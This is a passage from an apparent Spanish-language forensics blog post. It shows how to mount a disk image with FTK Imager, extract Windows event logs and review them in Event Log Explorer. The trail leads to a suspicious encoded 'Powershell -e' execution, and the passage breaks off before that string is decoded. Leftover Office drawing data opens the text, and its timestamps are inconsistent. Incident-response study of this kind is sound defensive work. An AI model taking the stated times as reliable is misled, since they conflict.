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
Cq/AB7cHn+ltv1EHFmCCeRw052Plp9TVuXe1M6/T08uMaUUANNh5BJSeXlO6Lt2e2l0aahfwtKWE
EW62EtoyusETIXwGZ9GpqBdR47K+XitdaqmnTKHXg9Aq1Wjd/pAWV/U18M3nBhqbmYLG3knbb9Ya
EDIjlLT9CQyN4TJKIHaE+uZCNIDjlpHk6Qt/lcyScCG3kAhTg+ukk2aDiEjMPUqitq+2X7iBxjqH
aN2qq5AQPlrl1iCtfGzKgdNtJ+PJBI+k6XaDoiyd3kKGT3OF86lmvzpYcbIpuLsfjk+8IZ3yhwhC
rNGqKgOOiYCzg2pqzTGBw7AikZXxN1eYsrRrnkbpGErpiCYhyiqKmcxTuE7lhTr6rrCBcZftGQxq
mCQrhMNAFVjTqFY1LapGqsPSqns+k7KckTTLmmllFVU13VnMWiEvA3O2vFqRN7TKTQw5zazwaeqe
T7lrea6b6xOKKgEGL+znqLoXKAiGauVilmpK48U0rHJ2RrVrR77Bc1S7SJEwsn4zFztnt6JGOJcD
4pUqP/DNRy2QJnlfqS3tOtjeQ4k3DKptHw6XYTj4DK7geNoH2qqirSoaXMGZM5SL9KC47WcXOQWe
p5QCU8sptRxTzyn1nNLIKY2c0swpTd/TJ6pwiq8OU30vPzCFGpYdsGa9hX36v/EvAAAA//8DAFBL
AwQUAAYACAAAACEAnGZGQbsAAAAkAQAAKgAAAGNsaXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3
aW5nMS54bWwucmVsc4SPzQrCMBCE74LvEPZu0noQkSa9iNCr1AcIyTYtNj8kUezbG+hFQfCyMLPs
N7NN+7IzeWJMk3ccaloBQae8npzhcOsvuyOQlKXTcvYOOSyYoBXbTXPFWeZylMYpJFIoLnEYcw4n
xpIa0cpEfUBXNoOPVuYio2FBqrs0yPZVdWDxkwHii0k6zSF2ugbSL6Ek/2f7YZgUnr16WHT5RwTL
pRcWoIwGMwdKV2edNS1dgYmGff0m3gAAAP//AwBQSwECLQAUAAYACAAAACEAu+VIlAUBAAAeAgAA
EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQCtMD/x
wQAAADIBAAALAAAAAAAAAAAAAAAAADYBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBKiZjw
xAIAAGQGAAAfAAAAAAAAAAAAAAAAACACAABjbGlwYm9hcmQvZHJhd2luZ3MvZHJhd2luZzEueG1s
UEsBAi0AFAAGAAgAAAAhAJJ9h+AdBwAASSAAABoAAAAAAAAAAAAAAAAAIQUAAGNsaXBib2FyZC90
aGVtZS90aGVtZTEueG1sUEsBAi0AFAAGAAgAAAAhAJxmRkG7AAAAJAEAACoAAAAAAAAAAAAAAAAA
dgwAAGNsaXBib2FyZC9kcmF3aW5ncy9fcmVscy9kcmF3aW5nMS54bWwucmVsc1BLBQYAAAAABQAF
AGcBAAB5DQAAAAA=
" filled="f" strokecolor="#00b050" strokeweight="1pt">
<w:wrap anchorx="margin"/>
</v:rect><![endif]--><!--[if !vml]--><span style="height: 14px; margin-left: 0px; margin-top: 66px; mso-ignore: vglayout; position: absolute; width: 411px; z-index: 251668480;"><br /></span><!--[endif]--><!--[if gte vml 1]><v:rect id="Rectangle_x0020_38"
o:spid="_x0000_s1030" style='position:absolute;margin-left:0;margin-top:92.25pt;
width:306.3pt;height:9.15pt;z-index:251666432;visibility:visible;
mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;
mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;
mso-position-horizontal:left;mso-position-horizontal-relative:margin;
mso-position-vertical:absolute;mso-position-vertical-relative:text;
v-text-anchor:middle' o:gfxdata="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
brYS2jK6wRMhfAZn0amoF1Hjsr5eK11qqadModeD0CrVaN3+kBZX9TXwzecGGpuZgsbeSdtv1hoQ
MiOUtP0JDI3hMkogdoT65kI0gOOWkeTpC3+VzJJwIbeQCFOD66STZoOISMw9SqK2r7ZfuIHGOodo
3aqrkBA+WuXWIK18bMqB020n48kEj6TpdoOiLJ3eQoZPc4XzqWa/Olhxsim4ux+OT7whnfKHCEKs
0aoqA46JgLODamrNMYHDsCKRlfE3V5iytGueRukYSumIJiHKKoqZzFO4TuWFOvqusIFxl+0ZDGqY
JCuEw0AVWNOoVjUtqkaqw9Kqez6TspyRNMuaaWUVVTXdWcxaIS8Dc7a8WpE3tMpNDDnNrPBp6p5P
uWt5rpvrE4oqAQYv7OeouhcoCIZq5WKWakrjxTSscnZGtWtHvsFzVLtIkTCyfjMXO2e3okY4lwPi
lSo/8M1HLZAmeV+pLe062N5DiTcMqm0fDpdhOPgMruB42gfaqqKtKhpcwZkzlIv0oLjtZxc5BZ6n
lAJTyym1HFPPKfWc0sgpjZzSzClN39MnqnCKrw5TfS8/MIUalh2wZr2Fffq/8S8AAAD//wMAUEsD
BBQABgAIAAAAIQCcZkZBuwAAACQBAAAqAAAAY2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2RyYXdp
bmcxLnhtbC5yZWxzhI/NCsIwEITvgu8Q9m7SehCRJr2I0KvUBwjJNi02PyRR7Nsb6EVB8LIws+w3
s037sjN5YkyTdxxqWgFBp7yenOFw6y+7I5CUpdNy9g45LJigFdtNc8VZ5nKUxikkUigucRhzDifG
khrRykR9QFc2g49W5iKjYUGquzTI9lV1YPGTAeKLSTrNIXa6BtIvoST/Z/thmBSevXpYdPlHBMul
FxagjAYzB0pXZ501LV2BiYZ9/SbeAAAA//8DAFBLAQItABQABgAIAAAAIQC75UiUBQEAAB4CAAAT
AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAK0wP/HB
AAAAMgEAAAsAAAAAAAAAAAAAAAAANgEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALi4lPjD
AgAAZAYAAB8AAAAAAAAAAAAAAAAAIAIAAGNsaXBib2FyZC9kcmF3aW5ncy9kcmF3aW5nMS54bWxQ
SwECLQAUAAYACAAAACEAkn2H4B0HAABJIAAAGgAAAAAAAAAAAAAAAAAgBQAAY2xpcGJvYXJkL3Ro
ZW1lL3RoZW1lMS54bWxQSwECLQAUAAYACAAAACEAnGZGQbsAAAAkAQAAKgAAAAAAAAAAAAAAAAB1
DAAAY2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2RyYXdpbmcxLnhtbC5yZWxzUEsFBgAAAAAFAAUA
ZwEAAHgNAAAAAA==
" filled="f" strokecolor="#00b050" strokeweight="1pt">
<w:wrap anchorx="margin"/>
</v:rect><![endif]--><!--[if !vml]--><span style="height: 15px; margin-left: 0px; margin-top: 122px; mso-ignore: vglayout; position: absolute; width: 411px; z-index: 251666432;"><br /></span><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-size: medium;"><b>Análisis de evidencias. Eventos del sistema:</b></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Llegados a este punto del análisis, nos vamos a dirigir a la imagen del disco duro del PC implicado para extraer los eventos del sistema.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Dentro de la Carpeta ForensicImages > DiskImage encontramos una serie de archivos con extensión *.drive.E0n, éstos son fragmentos de una imagen de disco duro realizada durante el triage con WLR, tal y como se puede ver en la imagen inferior.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNCg3WdMIlijDchBOqvvKtVFd89zmxWxlhl93X3Pm7cQiGCg1bMZNzE7u7grGVWC_a4JKbathJUbOnnVrcQKi1wupaNaF2xZUsI7mdpiLDp29W45Zgol666gjOEByTQKtIUEmp9fEFP0_xng_g3Q574qhNGbTs0Ilv1KoRcCJ1sy40ftBuR4oyDh5vHUI/s567/Imagen10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="110" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNCg3WdMIlijDchBOqvvKtVFd89zmxWxlhl93X3Pm7cQiGCg1bMZNzE7u7grGVWC_a4JKbathJUbOnnVrcQKi1wupaNaF2xZUsI7mdpiLDp29W45Zgol666gjOEByTQKtIUEmp9fEFP0_xng_g3Q574qhNGbTs0Ilv1KoRcCJ1sy40ftBuR4oyDh5vHUI/s16000/Imagen10.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Para poder montar la imagen de disco utilizamos la herramienta FTK Imager de AccessData que se puede descargar de forma gratuita del siguiente enlace <a href="https://accessdata.com/product-download/ftk-imager-version-4-5">https://accessdata.com/product-download/ftk-imager-version-4-5</a> tras registrarse.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Desde dentro de la herramienta elegiremos como origen Image File y seleccionaremos el primer E01 para montar el disco al completo.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbNiphYVdmKmRzyYkx-K5krM7_4iqX3otXc4jSW-wCk-EI4J7_5jqI6MU8-_Ry3OoMtzNrXCiH2uSUScMsnpy3kgqSxmb4A2KCrx4sko1eJg7TQlWuX_7806rQZKbJM9cJtWBT3BUog2-EbHvT-B0McNHEc4jVcXksBC6L1LpJbPxB8ieiz96ZqmSwG9Y/s247/Imagen11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="199" data-original-width="247" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbNiphYVdmKmRzyYkx-K5krM7_4iqX3otXc4jSW-wCk-EI4J7_5jqI6MU8-_Ry3OoMtzNrXCiH2uSUScMsnpy3kgqSxmb4A2KCrx4sko1eJg7TQlWuX_7806rQZKbJM9cJtWBT3BUog2-EbHvT-B0McNHEc4jVcXksBC6L1LpJbPxB8ieiz96ZqmSwG9Y/s1600/Imagen11.png" width="247" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Una vez montado, nos aparecerá el árbol completo de directorios del sistema como se puede ver en la siguiente imagen:</div><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq46rTm8UmVi3rKHTTek0nFsC0OJBLNb63QhqAsq6VGdKe4OvmLA1A13QSTogIInK7-sYbmJ_Br_MP8gN9x_96IRfVM7JPceJw2PdlOmMC4EzPzoCZTJPUzY0C3E9btuyvijM5cJHi7dLub5EmOXHG4K2wFY8ldx_sQfhQ5iC8FcGixv49dbEG7ARJQ4k/s567/Imagen12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="253" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq46rTm8UmVi3rKHTTek0nFsC0OJBLNb63QhqAsq6VGdKe4OvmLA1A13QSTogIInK7-sYbmJ_Br_MP8gN9x_96IRfVM7JPceJw2PdlOmMC4EzPzoCZTJPUzY0C3E9btuyvijM5cJHi7dLub5EmOXHG4K2wFY8ldx_sQfhQ5iC8FcGixv49dbEG7ARJQ4k/s16000/Imagen12.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Accederemos a la ruta C:\Windows\System32\Winevt\Logs y extraeremos los eventos del sistema System.evtx y Microsoft-Windows-PowerShell%4Operational.evtx</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAMFNtP8oaN3vbFSxePZYibtTcLGIWWppQ9lda4nb_ZQtLLT0noUUbMV5sxMbe9HloezkwN_Xwf7aqzfQXgMGs5iXDXrXYmezPrhSo9b2tPXZw-gsTR_gisRQZ9zRvK7ORFFgUwdA1rn624cgk1cZw6cMtFbuGzY-ZNgrBB3e7BJoUYBENqKIOUeDh-oA/s567/Imagen13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="135" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAMFNtP8oaN3vbFSxePZYibtTcLGIWWppQ9lda4nb_ZQtLLT0noUUbMV5sxMbe9HloezkwN_Xwf7aqzfQXgMGs5iXDXrXYmezPrhSo9b2tPXZw-gsTR_gisRQZ9zRvK7ORFFgUwdA1rn624cgk1cZw6cMtFbuGzY-ZNgrBB3e7BJoUYBENqKIOUeDh-oA/s16000/Imagen13.png" /></a></div><p></p><p class="MsoNormal"></p><div style="text-align: justify;">Para poder visualizar los eventos del sistema tenemos varias herramientas, podemos tirar del propio visor de eventos de Windows, utilizar Full Event Log View de Nirsoft <a href="https://www.nirsoft.net/utils/full_event_log_view.html">https://www.nirsoft.net/utils/full_event_log_view.html</a> o mi preferido, Even Log Explorer <a href="https://eventlogxp.com/download.php">https://eventlogxp.com/download.php</a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Event Log Explorer (en adelante ELE) es un programa de pago, pero que mediante registro te permite hacer uso de la solución durante un periodo de 30 días y una vez acabados puedes solicitar la ampliación de la licencia.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Para poder cargar los eventos en ELE, simplemente nos dirigimos a File > Open Log File > Standard y seleccionamos el archivo de eventos que queramos visualizar.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">En este caso vamos a empezar por Microsoft-Windows-PowerShell%4Operational.evtx ya que en este archivo se guardan todas las ejecuciones realizadas a través de Powershell y nos interesa comprobar si se puede ver alguna ejecución de Powershell que demuestre las incidencias sobre las que se queja Raúl.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Lo primero que hacemos siempre que se trabaja con Event Log Explorer es ajustar la hora a UTC para no equivocarnos y a partir de ahí mentalmente se suman las horas para ajustar el tiempo a la hora que tenía el sistema, en este caso era UTC + 1 (Madrid) pero en horario de verano, es decir, 2 horas más.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Para ajustar el tiempo, nos dirigiremos a View > Time Correction </div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1OQfmNKDXaQqk6rqAG6ZADrFN1tSASQ4eizL1JU7akkKFH093tU8Cdrgr3NmTlVS_m8M2zcjT6qKqFAPoQXDW5p_0UR4K0Ju2IoQjWpaBlWPoJ_XWlQxdNMCekm3XIjiZXxqa9j81S922wkKSWSDPA_tP9fV67_X5-c7daubhADI0DPP8bbYCDK04ADA/s567/Imagen14.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1OQfmNKDXaQqk6rqAG6ZADrFN1tSASQ4eizL1JU7akkKFH093tU8Cdrgr3NmTlVS_m8M2zcjT6qKqFAPoQXDW5p_0UR4K0Ju2IoQjWpaBlWPoJ_XWlQxdNMCekm3XIjiZXxqa9j81S922wkKSWSDPA_tP9fV67_X5-c7daubhADI0DPP8bbYCDK04ADA/s16000/Imagen14.png" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Y aplicamos en UTC</div><div style="text-align: justify;"><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz4GR5ZxUr0v342IWJROwpgO1lv1UFC9k8Blhp8ADTP9o7Z18_-nvKscyoxooBX4abc_F3ob7wZCTuvev_Oy8ggoXfvO9Ax8qmp7v8UH3_76VrrLFbCAghyphenhyphenPOCOYjJsrGCMc3E43dCflLDZ6UELg1pEHamLzYL8dVErFTit1jGOCUQd5ntgKlCxpCpEck/s223/Imagen15.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="147" data-original-width="223" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz4GR5ZxUr0v342IWJROwpgO1lv1UFC9k8Blhp8ADTP9o7Z18_-nvKscyoxooBX4abc_F3ob7wZCTuvev_Oy8ggoXfvO9Ax8qmp7v8UH3_76VrrLFbCAghyphenhyphenPOCOYjJsrGCMc3E43dCflLDZ6UELg1pEHamLzYL8dVErFTit1jGOCUQd5ntgKlCxpCpEck/s1600/Imagen15.png" width="223" /></a></div></div><p></p><p class="MsoNormal"><o:p></o:p></p>
<br /><div style="text-align: justify;">A continuación, nos dirigimos a las 11:17 (15:17 UTC + 2) ya que el fichero LastActivityView.html mostraba una ejecución de Powershell a las 13:16 (UTC + 2) y se puede observar una ejecución de Powershell -e junto a un string de caracteres ilegible.</div><p class="MsoNormal"><o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaY6kSPO0knTHa8J67mscrSwWFeWC2Bs7o8ra18PPNEDjzPBlJkv2Bo2BFpUmbPm0IdQBYZBpY42YogKjEtkHSYKMGxa7LsC4wuGy5OyzdWlGeSWejVN4EFPO_1XB-9f-WoFW_gOba9BYE04JrOGofjMI8zd0v5ov2nSp8vcwvYUvn0UbPZFfZrYxUjrE/s567/Imagen16.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="188" data-original-width="567" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaY6kSPO0knTHa8J67mscrSwWFeWC2Bs7o8ra18PPNEDjzPBlJkv2Bo2BFpUmbPm0IdQBYZBpY42YogKjEtkHSYKMGxa7LsC4wuGy5OyzdWlGeSWejVN4EFPO_1XB-9f-WoFW_gOba9BYE04JrOGofjMI8zd0v5ov2nSp8vcwvYUvn0UbPZFfZrYxUjrE/s16000/Imagen16.png" /></a></div><p></p>
<p class="MsoNormal">Observando que el string acaba en == se puede intuir que se
trata de un string de texto codificado en Base64, por lo que nos dirigimos a la
